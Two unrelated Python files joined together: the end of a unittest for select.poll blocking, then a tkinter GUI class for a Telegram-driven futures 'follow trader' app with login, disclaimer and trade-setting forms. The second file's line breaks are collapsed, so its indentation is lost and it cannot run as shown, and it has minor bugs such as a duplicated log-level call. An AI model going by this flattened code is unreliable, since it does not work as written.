    # threading era; confirm before removing.
    @unittest.skipUnless(threading, 'Threading required for this test.')
    @reap_threads
    def test_poll_blocks_with_negative_ms(self):
        # Any negative or None timeout must block indefinitely (until data).
        for timeout_ms in [None, -1000, -1, -1.0, -0.1, -1e-100]:
            # Create two file descriptors. This will be used to unlock
            # the blocking call to poll.poll inside the thread
            r, w = os.pipe()
            pollster = select.poll()
            pollster.register(r, select.POLLIN)

            poll_thread = threading.Thread(target=pollster.poll, args=(timeout_ms,))
            poll_thread.start()
            poll_thread.join(timeout=0.1)
            self.assertTrue(poll_thread.is_alive())

            # Write to the pipe so pollster.poll unblocks and the thread ends.
            os.write(w, b'spam')
            poll_thread.join()
            self.assertFalse(poll_thread.is_alive())
            os.close(r)
            os.close(w)


def test_main():
    run_unittest(PollTests)

if __name__ == '__main__':
    test_main()
# --- base_trade_app.py ---
import tkinter as tk from tkinter import ttk, font, messagebox import telethon from config import Config from functools import partial import threading import logging.handlers import sys import constants from styles import UI import utils import textwrap import os from sys import platform as _platform logger = logging.getLogger('tft') rotate_file_handler = logging.handlers.RotatingFileHandler(utils.get_dir_path_by_platform() + "tft.log", encoding='utf-8', maxBytes=1024 * 1024 * 2, backupCount=5) stdout_handler = logging.StreamHandler(sys.stdout) stdout_handler.setLevel(logging.INFO) stderr_handler = logging.StreamHandler(sys.stderr) stdout_handler.setLevel(logging.ERROR) handlers = [rotate_file_handler, stdout_handler, stderr_handler] logging.basicConfig( level=logging.INFO, format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s', handlers=handlers ) class BaseTradeApp(): app = None trade_app = None login_form = None config = Config() telegram_dialog_list = [] async_loop = None tg = None # Disclaimer disclaimer_form = None # Login form login_form = None api_id_label = None api_id_var = None api_id_entry = None api_hash_label = None api_hash_var = None api_hash_entry = None phone_number_label = None phone_number_var = None phone_number_entry = None login_button = None verify_button_var = None # Verify form verify_phone_form = None verify_password_form = None # Trade App app_title = 'Telegram Follow Trader' # Setting selected_dialog_id = None selected_trade_mode = None # GUI setting_trade_app_frame = None console_trade_app_frame = None remark_trade_app_frame = None label_frame_font_style = None label_font_style = None label_width = None input_width = None # GUI - dialog dialog_frame = None dialog_select_frame = None dialog_select = None dialog_update_button = None dialog_button_frame = None dialog_test_button = None dialog_save_setting_button = None open_buy_template_var = None open_buy_template_entry = None close_buy_template_var = None 
close_buy_template_entry = None open_sell_template_var = None open_sell_template_entry = None close_sell_template_var = None close_sell_template_entry = None time_format_var = None time_format_entry = None # GUI - Trade Account trade_account_frame = None trade_password_entry = None trade_port_entry = None trade_port_var = None trade_password_test_button = None # GUI - Trade Setting trade_setting_frame = None trade_setting_frame_1 = None trade_mode_frame = None trade_mode_var = None trade_mode_fixed_quantity = None trade_mode_max_quantity = None trade_product_frame = None trade_product_hsi_var = None trade_product_mhi_var = None trade_product_hsi = None trade_product_mhi = None trade_quantity_frame = None hsi_trade_quantity_var = None hsi_trade_quantity_entry = None mhi_trade_quantity_var = None mhi_trade_quantity_entry = None hsi_margin_frame = None hsi_margin_var = None hsi_margin_entry = None mhi_margin_frame = None mhi_margin_var = None mhi_margin_entry = None trade_setting_frame_2 = None trade_period_frame = None trade_period_morning_var = None trade_period_afternoon_var = None trade_period_night_var = None trade_period_morning = None trade_period_afternoon = None trade_period_night = None open_extra_price_frame = None open_extra_price_var = None open_extra_price_entry = None close_price_adjust_interval_frame = None close_price_adjust_interval_var = None close_price_adjust_interval_entry = None cancel_unfulfilled_order_after_second_frame = None cancel_unfulfilled_order_after_second_var = None cancel_unfulfilled_order_after_second_entry = None trade_only_within_second_frame = None trade_only_within_second_var = None trade_only_within_second_entry = None trade_setting_frame_3 = None manual_confirm_trade_message_var = None manual_confirm_trade_message = None start_button_font_style = None start_follow_trade_button = None # GUI Console console_text_cache = "" console_text_cache_time = "" console_text = None clear_console_button = None # GUI Remark disclaimer_link = 
None github_link = None def __init__(self, loop): self.async_loop = loop disclaimer_version, disclaimer_content = utils.get_disclaimer_version_and_content() local_disclaimer_version = self.config.get_disclaimer_version() self.app = tk.Tk() if _platform != constants.MAC_PLATFORM_NAME: icon_file = "icon.ico" if not hasattr(sys, "frozen"): icon_file = os.path.join(os.path.dirname(__file__), icon_file) else: icon_file = os.path.join(sys.prefix, icon_file) if os.path.exists(icon_file): self.app.iconbitmap(True, icon_file) self.load_login_form_gui() self.load_login_form_config() self.app.lift() self.app.attributes('-topmost', True) self.app.attributes('-topmost', False) if disclaimer_version is not None and disclaimer_version != local_disclaimer_version: self.config.save_disclaimer_version(disclaimer_version) self.config.save_disclaimer_understand_and_agree("N") is_accepted = self.config.get_disclaimer_understand_and_agree() if is_accepted != "Y": self.app.withdraw() self.load_disclaimer(disclaimer_content) self.app.protocol("WM_DELETE_WINDOW", self.quit_app) self.app.mainloop() def quit_app(self): pass def agree_disclaimer(self): self.config.save_disclaimer_understand_and_agree("Y") self.disclaimer_form.destroy() self.app.deiconify() self.app.lift() def load_disclaimer(self, disclaimer_content=None, read_only=False): if read_only is True: disclaimer_version, disclaimer_content = utils.get_disclaimer_version_and_content() def agree_checkbox_on_change(): if agree_var1.get() is True and agree_var2.get() is True: self.enable_elements(confirm_button) else: self.disable_elements(confirm_button) disclaimer_form = tk.Toplevel(self.app) disclaimer_form.resizable(False, False) disclaimer_form.grab_set() disclaimer_form.lift() disclaimer_form.attributes('-topmost', True) disclaimer_form.attributes('-topmost', False) screenwidth = disclaimer_form.winfo_screenwidth() screenheight = disclaimer_form.winfo_screenheight() width = UI.Disclaimer.WIDTH height = UI.Disclaimer.HEIGHT if 
read_only is True: height = UI.Disclaimer.READ_ONLY_HEIGHT disclaimer_form.geometry('%dx%d+%d+%d' % (width, height, (screenwidth / 2) - (width / 2), (screenheight / 2) - (height / 2))) disclaimer_form.title(self.app_title) title_font = tk.font.Font(size=UI.Disclaimer.TITLE_FONT_SIZE, underline=True, weight="bold") title = tk.Label(disclaimer_form, text="免責聲明", anchor=tk.W, font=title_font) title.pack() content_font = tk.font.Font(size=UI.Disclaimer.CONTENT_FONT_SIZE) content_frame = tk.Frame(disclaimer_form) canvas = tk.Canvas(content_frame, width=UI.Disclaimer.CANVAS_WIDTH, height=UI.Disclaimer.CANVAS_HEIGHT) scrollbar = ttk.Scrollbar(content_frame, orient=tk.VERTICAL, command=canvas.yview) scrollable_frame = tk.Frame(canvas) scrollable_frame.bind( "<Configure>", lambda e: canvas.configure( scrollregion=canvas.bbox(tk.ALL) ) ) canvas.create_window((0, 0), window=scrollable_frame, anchor=tk.NW) canvas.configure(yscrollcommand=scrollbar.set) if disclaimer_content is not None: disclaimer_content_line_list = disclaimer_content.split("\n") for line in disclaimer_content_line_list: tk.Label(scrollable_frame, text=line, width=UI.Disclaimer.LABEL_WIDTH, anchor=tk.W, justify=tk.LEFT, font=content_font, wraplength=UI.Disclaimer.WRAP_LENGTH, padx=UI.Disclaimer.PADDING).pack() else: tk.Label(scrollable_frame, text="無法載入內文,請參閱以下網頁的內容:", anchor=tk.W, justify=tk.LEFT, font=content_font).grid(row=0, column=0, padx=UI.Disclaimer.PADDING, sticky=tk.W) disclaimer_link = tk.Label(scrollable_frame, text=constants.DISCLAIMER_LINK, anchor=tk.W, justify=tk.LEFT, fg="blue", cursor="hand2", font=content_font) disclaimer_link.grid(row=1, column=0, padx=UI.Disclaimer.PADDING, sticky=tk.W) disclaimer_link.bind("<Button-1>", lambda e: utils.open_link(constants.DISCLAIMER_LINK)) tk.Label(scrollable_frame, text="所有免責聲明條款以網頁版本內文為準。", anchor=tk.W, justify=tk.LEFT, font=content_font).grid(row=2, column=0, padx=UI.Disclaimer.PADDING, sticky=tk.W) content_frame.pack() canvas.pack(side=tk.LEFT, 
fill=tk.BOTH, expand=True) scrollbar.pack(side=tk.RIGHT, fill=tk.Y) if read_only is False: agree_var1 = tk.BooleanVar() agree_checkbox1 = tk.Checkbutton(disclaimer_form, text="本人明白及同意以上聲明", anchor=tk.W, font=content_font, var=agree_var1, command=agree_checkbox_on_change) agree_checkbox1.pack() agree_checkbox1.place(x=UI.Disclaimer.AGREE_CHECKBOX1_X, y=UI.Disclaimer.AGREE_CHECKBOX1_Y) agree_var2 = tk.BooleanVar() agree_checkbox2 = tk.Checkbutton(disclaimer_form, text="本人授權該軟件收取Telegram訊息及連接證券交易服務提供者進行交易", anchor=tk.W, font=content_font, var=agree_var2, command=agree_checkbox_on_change) agree_checkbox2.pack() agree_checkbox2.place(x=UI.Disclaimer.AGREE_CHECKBOX2_X, y=UI.Disclaimer.AGREE_CHECKBOX2_Y) confirm_button = tk.Button(disclaimer_form, text="確定", font=content_font, command=self.agree_disclaimer, state=tk.DISABLED) confirm_button.pack() confirm_button.place(height=UI.Disclaimer.CONFIRM_BUTTON_HEIGHT, width=UI.Disclaimer.CONFIRM_BUTTON_WIDTH, x=UI.Disclaimer.CONFIRM_BUTTON_X, y=UI.Disclaimer.CONFIRM_BUTTON_Y) cancel_button = tk.Button(disclaimer_form, text="取消", font=content_font, command=self.quit_app) cancel_button.pack() cancel_button.place(height=UI.Disclaimer.CANCEL_BUTTON_HEIGHT, width=UI.Disclaimer.CANCEL_BUTTON_WIDTH, x=UI.Disclaimer.CANCEL_BUTTON_X, y=UI.Disclaimer.CANCEL_BUTTON_Y) disclaimer_form.protocol("WM_DELETE_WINDOW", self.quit_app) self.disclaimer_form = disclaimer_form def load_login_form_gui(self): login_form = self.app login_form.resizable(False, False) screenwidth = login_form.winfo_screenwidth() screenheight = login_form.winfo_screenheight() width = UI.LoginForm.WIDTH height = UI.LoginForm.HEIGHT login_form.geometry('%dx%d+%d+%d' % (width, height, (screenwidth / 2) - (width / 2), (screenheight / 2) - (height / 2))) login_form.title(self.app_title) label_width = UI.LoginForm.LABEL_WIDTH input_width = UI.LoginForm.INPUT_WIDTH self.api_id_label = tk.Label(login_form, text="API ID", anchor=tk.W, width=label_width) self.api_id_label.grid(row=0, 
column=0, padx=(UI.LoginForm.PADDING, 0)) self.api_id_var = tk.StringVar() self.api_id_entry = tk.Entry(login_form, textvariable=self.api_id_var, width=input_width) self.api_id_entry.grid(row=0, column=1, padx=(0, UI.LoginForm.PADDING)) self.api_hash_label = tk.Label(login_form, text="API Hash", anchor=tk.W, width=label_width) self.api_hash_label.grid(row=1, column=0, padx=(UI.LoginForm.PADDING, 0)) self.api_hash_entry = tk.StringVar() self.api_hash_entry = tk.Entry(login_form, textvariable=self.api_hash_entry, width=input_width) self.api_hash_entry.grid(row=1, column=1, padx=(0, UI.LoginForm.PADDING)) self.phone_number_label = tk.Label(login_form, text="電話號碼", anchor=tk.W, width=label_width) self.phone_number_label.grid(row=2, column=0, padx=(UI.LoginForm.PADDING, 0)) self.phone_number_var = tk.StringVar() self.phone_number_entry = tk.Entry(login_form, textvariable=self.phone_number_var, width=input_width) self.phone_number_entry.grid(row=2, column=1, padx=(0, UI.LoginForm.PADDING)) self.login_button = tk.Button(login_form, text="登入", command=lambda: self.run_async_task(self.login)) self.login_button.grid(row=3, column=1, sticky=tk.E, padx=(0, UI.LoginForm.LOGIN_BUTTON_PADDING_X), pady=UI.LoginForm.LOGIN_BUTTON_PADDING_Y) self.app = login_form def load_login_form_config(self): if constants.SAVE_TELEGRAM_LOGIN_INFORMATION: api_id = self.config.get_telegram_setting("api_id") api_hash = self.config.get_telegram_setting("api_hash") phone_number = self.config.get_telegram_setting("phone_number") if api_id is not None and api_id != "": self.api_id_entry.insert(tk.END, api_id) if api_hash is not None and api_hash != "": self.api_hash_entry.insert(tk.END, api_hash) if phone_number is not None and phone_number != "": self.phone_number_entry.insert(tk.END, phone_number) async def login(self): pass async def get_verification_code(self): pass def remove_login_form_gui(self): self.api_id_label.grid_remove() self.api_id_entry.grid_remove() self.api_hash_label.grid_remove() 
self.api_hash_entry.grid_remove() self.phone_number_label.grid_remove() self.phone_number_entry.grid_remove() self.login_button.grid_remove() def load_trade_app_gui(self): trade_app = self.app trade_app.title(self.app_title) self.remove_login_form_gui() screenwidth = trade_app.winfo_screenwidth() screenheight = trade_app.winfo_screenheight() width = UI.Main.WIDTH height = UI.Main.HEIGHT padding = UI.Main.PADDING frame_padding_x = UI.Main.FRAME_PADDING_X frame_padding_y = UI.Main.FRAME_PADDING_Y frame_width = width - (frame_padding_x * 2) trade_app.geometry('%dx%d+%d+%d' % (width, height, (screenwidth / 2) - (width / 2), (screenheight / 2) - (height / 2))) trade_app.resizable(False, False) self.label_frame_font_style = tk.font.Font(size=UI.Main.FRAME_FONT_SIZE) self.label_font_style = tk.font.Font(size=UI.Main.CONTENT_FONT_SIZE) self.label_width = UI.Main.LABEL_WIDTH self.input_width = UI.Main.INPUT_WIDTH self.setting_trade_app_frame = tk.Frame(trade_app, width=width, height=UI.Main.SETTING_FRAME_HEIGHT) self.console_trade_app_frame = tk.Frame(trade_app, width=width, height=UI.Main.CONSOLE_FRAME_HEIGHT) self.remark_trade_app_frame = tk.Frame(trade_app, width=width, bg="yellow", height=UI.Main.REMARK_FRAME_HEIGHT) self.dialog_frame = tk.LabelFrame(self.setting_trade_app_frame, text='頻道設定', font=self.label_frame_font_style, width=frame_width, height=UI.Main.DIALOG_FRAME_HEIGHT, padx=frame_padding_x, pady=frame_padding_y) self.dialog_frame.grid_propagate(False) self.dialog_frame.grid(row=0, padx=frame_padding_x, pady=frame_padding_y) tk.Label(self.dialog_frame, text="選擇頻道", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=0, column=0, padx=0, pady=(padding, 0), sticky=tk.W) self.dialog_select_frame = tk.Frame(self.dialog_frame) self.dialog_select_frame.grid(row=0, column=1, columnspan=4, sticky=tk.W) self.dialog_select = ttk.Combobox(self.dialog_select_frame, state="readonly", width=UI.Main.DIALOG_SELECT_WIDTH) self.dialog_select.grid(row=0, 
column=0, sticky=tk.W, pady=padding) self.dialog_select.bind("<<ComboboxSelected>>", self.dialog_select_on_select) self.dialog_update_button = tk.Button(self.dialog_select_frame, text="刷新", font=self.label_font_style, command=lambda: self.run_async_task(self.refresh_dialog_list)) self.dialog_update_button.grid(row=0, column=1, sticky=tk.W, padx=padding, pady=padding) self.dialog_test_button = tk.Button(self.dialog_select_frame, text="測試", font=self.label_font_style, command=lambda: self.run_async_task(self.test_dialog_setting), state=tk.DISABLED) self.dialog_test_button.grid(row=0, column=2, sticky=tk.NE, padx=(0, padding), pady=padding) self.dialog_save_setting_button = tk.Button(self.dialog_select_frame, text="儲存訊息設定", font=self.label_font_style, command=self.save_dialog_setting, state=tk.DISABLED) self.dialog_save_setting_button.grid(row=0, column=3, sticky=tk.NE, padx=(0, UI.Main.DIALOG_SAVE_SETTING_BUTTON_PADDING_X), pady=UI.Main.DIALOG_SAVE_SETTING_BUTTON_PADDING_Y) tk.Label(self.dialog_frame, text="建好倉訊息", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=1, column=0, padx=0, pady=(0, padding), sticky=tk.W) self.open_buy_template_var = tk.StringVar() self.open_buy_template_entry = tk.Entry(self.dialog_frame, textvariable=self.open_buy_template_var, width=self.input_width, state=tk.DISABLED) self.open_buy_template_entry.grid(row=1, column=1, sticky=tk.W, padx=(0, UI.Main.DIALOG_INPUT_PADDING_X), pady=(0, padding)) tk.Label(self.dialog_frame, text="平好倉訊息", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=1, column=2, padx=0, pady=(0, padding), sticky=tk.W) self.close_buy_template_var = tk.StringVar() self.close_buy_template_entry = tk.Entry(self.dialog_frame, textvariable=self.close_buy_template_var, width=self.input_width, state=tk.DISABLED) self.close_buy_template_entry.grid(row=1, column=3, sticky=tk.W, padx=(0, UI.Main.DIALOG_INPUT_RIGHT_PADDING_X), pady=(0, padding)) tk.Label(self.dialog_frame, 
text="建淡倉訊息", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=2, column=0, padx=0, pady=(0, padding), sticky=tk.W) self.open_sell_template_var = tk.StringVar() self.open_sell_template_entry = tk.Entry(self.dialog_frame, textvariable=self.open_sell_template_var, width=self.input_width, state=tk.DISABLED) self.open_sell_template_entry.grid(row=2, column=1, sticky=tk.W, padx=(0, UI.Main.DIALOG_INPUT_PADDING_X), pady=(0, padding)) tk.Label(self.dialog_frame, text="平淡倉訊息", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=2, column=2, padx=0, pady=(0, padding)) self.close_sell_template_var = tk.StringVar() self.close_sell_template_entry = tk.Entry(self.dialog_frame, textvariable=self.close_sell_template_var, width=self.input_width, state=tk.DISABLED) self.close_sell_template_entry.grid(row=2, column=3, sticky=tk.W, padx=(0, UI.Main.DIALOG_INPUT_RIGHT_PADDING_X), pady=(0, padding)) tk.Label(self.dialog_frame, text="時間格式", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=3, column=0, padx=0, pady=(0, padding), sticky=tk.W) self.time_format_var = tk.StringVar() self.time_format_entry = tk.Entry(self.dialog_frame, textvariable=self.time_format_var, width=self.input_width, state=tk.DISABLED) self.time_format_entry.grid(row=3, column=1, sticky=tk.W, padx=(0, UI.Main.DIALOG_INPUT_PADDING_X), pady=UI.Main.TIME_FORMAT_INPUT_PADDING_Y) self.trade_account_frame = tk.LabelFrame(self.setting_trade_app_frame, text='交易帳戶', font=self.label_frame_font_style, width=frame_width, height=UI.Main.TRADE_ACCOUNT_FRAME_HEIGHT, padx=frame_padding_x, pady=frame_padding_y) self.trade_account_frame.grid_propagate(False) self.trade_account_frame.grid(row=1, padx=frame_padding_x, pady=0) tk.Label(self.trade_account_frame, text="交易密碼", font=self.label_font_style, width=UI.Main.TRADE_PASSWORD_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=0, pady=(0, 0), sticky=tk.W) self.trade_password_entry = 
tk.Entry(self.trade_account_frame, textvariable=tk.StringVar(), width=UI.Main.TRADE_PASSWORD_INPUT_WIDTH, show="*") self.trade_password_entry.grid(row=0, column=1, padx=UI.Main.TRADE_PASSWORD_INPUT_PADDING_X, pady=0, sticky=tk.W) tk.Label(self.trade_account_frame, text="端口(0-65535)", font=self.label_font_style, width=UI.Main.TRADE_PORT_INPUT_WIDTH, anchor=tk.E) \ .grid(row=0, column=2, padx=(padding, 0), pady=0) self.trade_port_var = tk.StringVar() self.trade_port_var.trace(tk.W, lambda name, index, mode, sv=self.trade_port_var: self.trade_port_entry_on_change(sv)) self.trade_port_entry = tk.Entry(self.trade_account_frame, textvariable=self.trade_port_var, width=6) self.trade_port_entry.grid(row=0, column=3, padx=UI.Main.TRADE_PORT_INPUT_PADDING_X, pady=0) self.trade_password_test_button = tk.Button(self.trade_account_frame, text="測試", font=self.label_font_style, command=lambda: self.run_async_task( self.test_trade_account_setting)) self.trade_password_test_button.grid(row=0, column=4, sticky=tk.NE, padx=(0, UI.Main.TRADE_PASSWORD_TEST_BUTTON_PADDING_X), pady=UI.Main.TRADE_PASSWORD_TEST_BUTTON_PADDING_Y) trade_setting_frame_height = UI.Main.TRADE_SETTING_FRAME_HEIGHT self.trade_setting_frame = tk.LabelFrame(self.setting_trade_app_frame, text='交易設定', font=self.label_frame_font_style, width=frame_width, height=trade_setting_frame_height) self.trade_setting_frame.grid_propagate(False) self.trade_setting_frame.grid(row=2, padx=frame_padding_x, pady=frame_padding_y) self.trade_setting_frame_1 = tk.Frame(self.trade_setting_frame, width=UI.Main.TRADE_SETTING_FRAME_1_WIDTH, height=trade_setting_frame_height - 20, padx=frame_padding_x, pady=frame_padding_y) self.trade_setting_frame_1.grid(row=0, column=0, sticky=tk.N) self.trade_setting_frame_1.grid_propagate(False) self.trade_mode_frame = tk.Frame(self.trade_setting_frame_1) self.trade_mode_frame.grid(row=0, column=0, sticky=tk.W) tk.Label(self.trade_mode_frame, text="交易模式", font=self.label_font_style, 
width=UI.Main.TRADE_MODE_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=0, pady=UI.Main.TRADE_MODE_LABEL_PADDING_Y, sticky=tk.W) self.trade_mode_var = tk.StringVar() self.trade_mode_var.set(constants.TradeMode.FIXED_QUANTITY) self.trade_mode_fixed_quantity = tk.Radiobutton(self.trade_mode_frame, text="固定數量", font=self.label_font_style, variable=self.trade_mode_var, value=constants.TradeMode.FIXED_QUANTITY, command=self.trade_mode_checkbox_on_change) self.trade_mode_max_quantity = tk.Radiobutton(self.trade_mode_frame, text="自動檢測最大可買數量", font=self.label_font_style, variable=self.trade_mode_var, value=constants.TradeMode.MAX_QUANTITY, command=self.trade_mode_checkbox_on_change) self.trade_mode_fixed_quantity.grid(row=0, column=1, pady=UI.Main.TRADE_MODE_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_mode_max_quantity.grid(row=0, column=2, pady=UI.Main.TRADE_MODE_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_product_frame = tk.Frame(self.trade_setting_frame_1) self.trade_product_frame.grid(row=1, column=0, sticky=tk.W) tk.Label(self.trade_product_frame, text="交易產品", font=self.label_font_style, width=UI.Main.TRADE_PRODUCT_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.TRADE_PRODUCT_LABEL_PADDING_X, pady=UI.Main.TRADE_PRODUCT_LABEL_PADDING_Y, sticky=tk.W) self.trade_product_hsi_var = tk.BooleanVar() self.trade_product_mhi_var = tk.BooleanVar() self.trade_product_hsi = tk.Checkbutton(self.trade_product_frame, text="恆生指數期貨", font=self.label_font_style, var=self.trade_product_hsi_var, command=self.trade_product_checkbox_on_change) self.trade_product_mhi = tk.Checkbutton(self.trade_product_frame, text="小型恆生指數期貨", font=self.label_font_style, var=self.trade_product_mhi_var, command=self.trade_product_checkbox_on_change) self.trade_product_hsi.grid(row=0, column=1, pady=UI.Main.TRADE_PRODUCT_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_product_mhi.grid(row=0, column=2, pady=UI.Main.TRADE_PRODUCT_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_quantity_frame = 
tk.Frame(self.trade_setting_frame_1) self.trade_quantity_frame.grid(row=2, column=0, sticky=tk.W) tk.Label(self.trade_quantity_frame, text="期貨交易數量", font=self.label_font_style, width=UI.Main.HSI_TRADE_QUANTITY_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.TRADE_QUANTITY_LABEL_PADDING_X, pady=UI.Main.TRADE_QUANTITY_LABEL_PADDING_Y, sticky=tk.W) self.hsi_trade_quantity_var = tk.StringVar() self.hsi_trade_quantity_var.trace(tk.W, lambda name, index, mode, sv=self.hsi_trade_quantity_var: self.trade_setting_entry_on_change(sv, "hsi_trade_quantity", constants.TkinterEntryType.POSITIVE_INTEGER)) self.hsi_trade_quantity_entry = tk.Entry(self.trade_quantity_frame, textvariable=self.hsi_trade_quantity_var, width=UI.Main.TRADE_QUANTITY_INPUT_WIDTH, justify='center') self.hsi_trade_quantity_entry.bind('<Control-v>', lambda e: 'break') self.hsi_trade_quantity_entry.grid(row=0, column=1, padx=UI.Main.TRADE_QUANTITY_INPUT_PADDING_X, pady=UI.Main.TRADE_QUANTITY_LABEL_PADDING_Y) tk.Label(self.trade_quantity_frame, text="小型期貨交易數量", font=self.label_font_style, width=UI.Main.MHI_TRADE_QUANTITY_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=2, padx=UI.Main.TRADE_QUANTITY_LABEL_PADDING_X, pady=UI.Main.TRADE_QUANTITY_LABEL_PADDING_Y) self.mhi_trade_quantity_var = tk.StringVar() self.mhi_trade_quantity_var.trace(tk.W, lambda name, index, mode, sv=self.mhi_trade_quantity_var: self.trade_setting_entry_on_change(sv, "mhi_trade_quantity", constants.TkinterEntryType.POSITIVE_INTEGER)) self.mhi_trade_quantity_entry = tk.Entry(self.trade_quantity_frame, textvariable=self.mhi_trade_quantity_var, width=UI.Main.TRADE_QUANTITY_INPUT_WIDTH, justify='center') self.mhi_trade_quantity_entry.bind('<Control-v>', lambda e: 'break') self.mhi_trade_quantity_entry.grid(row=0, column=3, padx=UI.Main.TRADE_QUANTITY_INPUT_PADDING_X, pady=UI.Main.TRADE_QUANTITY_INPUT_PADDING_Y) self.hsi_margin_frame = tk.Frame(self.trade_setting_frame_1) self.hsi_margin_frame.grid(row=3, column=0, sticky=tk.W) 
tk.Label(self.hsi_margin_frame, text="每達保證金", font=self.label_font_style, width=UI.Main.MARGIN_LABEL_WIDTH, anchor=tk.W) \ .grid(row=3, column=0, padx=UI.Main.MARGIN_LABEL_PADDING_X, pady=UI.Main.MARGIN_LABEL_PADDING_Y, sticky=tk.W) self.hsi_margin_var = tk.StringVar() self.hsi_margin_var.trace(tk.W, lambda name, index, mode, sv=self.hsi_margin_var: self.trade_setting_entry_on_change(sv, "hsi_margin", constants.TkinterEntryType.POSITIVE_INTEGER)) self.hsi_margin_entry = tk.Entry(self.hsi_margin_frame, textvariable=self.hsi_margin_var, width=UI.Main.MARGIN_INPUT_WIDTH, justify='center') self.hsi_margin_entry.bind('<Control-v>', lambda e: 'break') self.hsi_margin_entry.grid(row=3, column=1, padx=UI.Main.MARGIN_INPUT_PADDING_X, pady=UI.Main.MARGIN_INPUT_PADDING_Y) tk.Label(self.hsi_margin_frame, text="交易期貨一張", font=self.label_font_style, width=UI.Main.HSI_MARGIN_LABEL_WIDTH, anchor=tk.W) \ .grid(row=3, column=2, padx=(0, 0), pady=UI.Main.MARGIN_LABEL_PADDING_Y) self.mhi_margin_frame = tk.Frame(self.trade_setting_frame_1) self.mhi_margin_frame.grid(row=4, column=0, sticky=tk.W) tk.Label(self.mhi_margin_frame, text="每達保證金", font=self.label_font_style, width=UI.Main.MARGIN_LABEL_WIDTH, anchor=tk.W) \ .grid(row=3, column=0, padx=UI.Main.MARGIN_LABEL_PADDING_X, pady=UI.Main.MARGIN_LABEL_PADDING_Y) self.mhi_margin_var = tk.StringVar() self.mhi_margin_var.trace(tk.W, lambda name, index, mode, sv=self.mhi_margin_var: self.trade_setting_entry_on_change(sv, "mhi_margin", constants.TkinterEntryType.POSITIVE_INTEGER)) self.mhi_margin_entry = tk.Entry(self.mhi_margin_frame, textvariable=self.mhi_margin_var, width=UI.Main.MARGIN_INPUT_WIDTH, justify='center') self.mhi_margin_entry.bind('<Control-v>', lambda e: 'break') self.mhi_margin_entry.grid(row=3, column=1, padx=UI.Main.MARGIN_INPUT_PADDING_X, pady=UI.Main.MARGIN_INPUT_PADDING_Y) tk.Label(self.mhi_margin_frame, text="交易小型期貨一張", font=self.label_font_style, width=UI.Main.MHI_MARGIN_LABEL_WIDTH, anchor=tk.W) \ .grid(row=3, 
column=2, padx=(0, 0), pady=UI.Main.MARGIN_LABEL_PADDING_Y) self.trade_setting_frame_2 = tk.Frame(self.trade_setting_frame, width=UI.Main.TRADE_SETTING_FRAME_2_WIDTH, height=trade_setting_frame_height - 20, padx=frame_padding_x, pady=frame_padding_y) self.trade_setting_frame_2.grid(row=0, column=1, sticky=tk.N) self.trade_setting_frame_2.grid_propagate(False) self.trade_period_frame = tk.Frame(self.trade_setting_frame_2) self.trade_period_frame.grid(row=0, column=0, sticky=tk.NW) tk.Label(self.trade_period_frame, text="交易時段", font=self.label_font_style, width=UI.Main.TRADE_PERIOD_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.TRADE_PERIOD_LABEL_PADDING_X, pady=UI.Main.TRADE_PERIOD_LABEL_PADDING_Y) self.trade_period_morning_var = tk.BooleanVar() self.trade_period_afternoon_var = tk.BooleanVar() self.trade_period_night_var = tk.BooleanVar() self.trade_period_morning = tk.Checkbutton(self.trade_period_frame, text="上午", font=self.label_font_style, var=self.trade_period_morning_var, command=partial(self.trade_setting_checkbox_on_change, self.trade_period_morning_var, "trade_period_morning")) self.trade_period_afternoon = tk.Checkbutton(self.trade_period_frame, text="下午", font=self.label_font_style, var=self.trade_period_afternoon_var, command=partial(self.trade_setting_checkbox_on_change, self.trade_period_afternoon_var, "trade_period_afternoon")) self.trade_period_night = tk.Checkbutton(self.trade_period_frame, text="晚上", font=self.label_font_style, var=self.trade_period_night_var, command=partial(self.trade_setting_checkbox_on_change, self.trade_period_night_var, "trade_period_night")) self.trade_period_morning.grid(row=0, column=1, pady=UI.Main.TRADE_PERIOD_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_period_afternoon.grid(row=0, column=2, pady=UI.Main.TRADE_PERIOD_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_period_night.grid(row=0, column=3, pady=UI.Main.TRADE_PERIOD_CHECKBOX_PADDING_Y, sticky=tk.W) self.open_extra_price_frame = 
tk.Frame(self.trade_setting_frame_2) self.open_extra_price_frame.grid(row=1, column=0, sticky=tk.W) tk.Label(self.open_extra_price_frame, text="建倉追價", font=self.label_font_style, width=UI.Main.OPEN_EXTRA_PRICE_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.OPEN_EXTRA_PRICE_LABEL_PADDING_X, pady=UI.Main.OPEN_EXTRA_PRICE_LABEL_PADDING_Y) self.open_extra_price_var = tk.StringVar() self.open_extra_price_var.trace(tk.W, lambda name, index, mode, sv=self.open_extra_price_var: self.trade_setting_entry_on_change(sv, "open_extra_price", constants.TkinterEntryType.INTEGER)) self.open_extra_price_entry = tk.Entry(self.open_extra_price_frame, textvariable=self.open_extra_price_var, width=UI.Main.OPEN_EXTRA_PRICE_INPUT_WIDTH, justify='center') self.open_extra_price_entry.bind('<Control-v>', lambda e: 'break') self.open_extra_price_entry.grid(row=0, column=1, padx=UI.Main.OPEN_EXTRA_PRICE_INPUT_PADDING_X, pady=UI.Main.OPEN_EXTRA_PRICE_INPUT_PADDING_Y) self.close_price_adjust_interval_frame = tk.Frame(self.trade_setting_frame_2) 